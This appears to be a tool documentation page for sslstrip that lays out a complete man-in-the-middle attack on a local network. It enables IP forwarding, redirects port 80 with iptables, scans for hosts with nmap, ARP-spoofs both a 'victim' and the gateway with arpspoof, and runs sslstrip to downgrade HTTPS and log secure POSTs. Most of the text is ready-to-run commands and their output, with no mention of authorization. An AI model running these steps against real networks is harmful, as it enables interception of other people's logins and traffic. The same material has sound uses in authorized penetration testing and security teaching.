SSLStrip

Description

sslstrip is a tool that transparently hijacks HTTP traffic on a network, watch for HTTPS links and redirects, and then map those links into look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial.

Usage

Syntax

sslstrip <options>

Options

-w <filename>, --write=<filename> Specify file to log to (optional).
-p , --post                       Log only SSL POSTs. (default)
-s , --ssl                        Log all SSL traffic to and from server.
-a , --all                        Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port>        Port to listen on (default 10000).
-f , --favicon                    Substitute a lock favicon on secure requests.
-k , --killsessions               Kill sessions in progress.
-h                                Print this help message.

Example

Enable IP Forwarding

To allow traffic to flow through our machine, IP forwarding needs to be enabled. Open a terminal and run the following command

cyborg@cyborg:~$ sudo -s
[sudo] password for cyborg: 


root@cyborg:~# echo '1' > /proc/sys/net/ipv4/ip_forward

Add an IP Tables Rule to Redirect Traffic to SSLStrip

This adds an IP Tables rule so that our machine knows how to handle incoming traffic from the victim. The following rule will take any traffic originally destined for port 80 (HTTP, web traffic) and redirect it to port 8080, which SSLStrip will be running on.

root@cyborg:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

Identify Target and Gateway IP Addresses

root@cyborg:~# nmap -sP -T4 192.168.1.1/24

ARP Spoofing

This is where the meat of the attack takes place. Address Resolution Protocol, or ARP, is what is responsible for mapping IP addresses to MAC addresses. These mappings are stored in an ARP table on each machine connected to the network.

The ARP spoofing attack sends out false information to the machine you’re attacking, repeatedly telling it that the gateway IP address has changed. The IP address we give it is that of your machine. So now the victim thinks that you are the gateway, and will send all of it’s outgoing traffic to you!

We also need to ARP spoof the gateway as well, to make it think that you are the victim’s machine. By doing this attack, you are essentially becoming the Man In The Middle.

To ARP Spoof the victim:

arpspoof -i <interface> -t <target IP> <gateway IP>

root@cyborg:~# arpspoof -i eth0 -t 192.168.1.18 192.168.1.1
0:e0:4c:37:0:93 18:67:b0:27:e5:15 0806 42: arp reply 192.168.1.1 is-at 0:e0:4c:37:0:93
0:e0:4c:37:0:93 18:67:b0:27:e5:15 0806 42: arp reply 192.168.1.1 is-at 0:e0:4c:37:0:93

To ARP Spoof the gateway router :

arpspoof -i <interface> -t <gateway IP> <target IP>

root@cyborg:~# arpspoof -i eth0 -t 192.168.1.1 192.168.1.18
0:e0:4c:37:0:93 0:26:15:67:e6:c3 0806 42: arp reply 192.168.1.18 is-at 0:e0:4c:37:0:93
0:e0:4c:37:0:93 0:26:15:67:e6:c3 0806 42: arp reply 192.168.1.18 is-at 0:e0:4c:37:0:93 

Run these commands in their own separate terminal tabs so that you can flick between them and monitor each one.

Running SSLStrip

root@cyborg:~# sslstrip -k -l 8080

sslstrip 0.9 by Moxie Marlinspike running...
0 Comments

Leave a reply

CONTACT US

We're are building as a community and a team. Be a part of it.

Sending

©2017 Ztrela Knowledge Solutions Pvt. Ltd

Log in with your credentials

Forgot your details?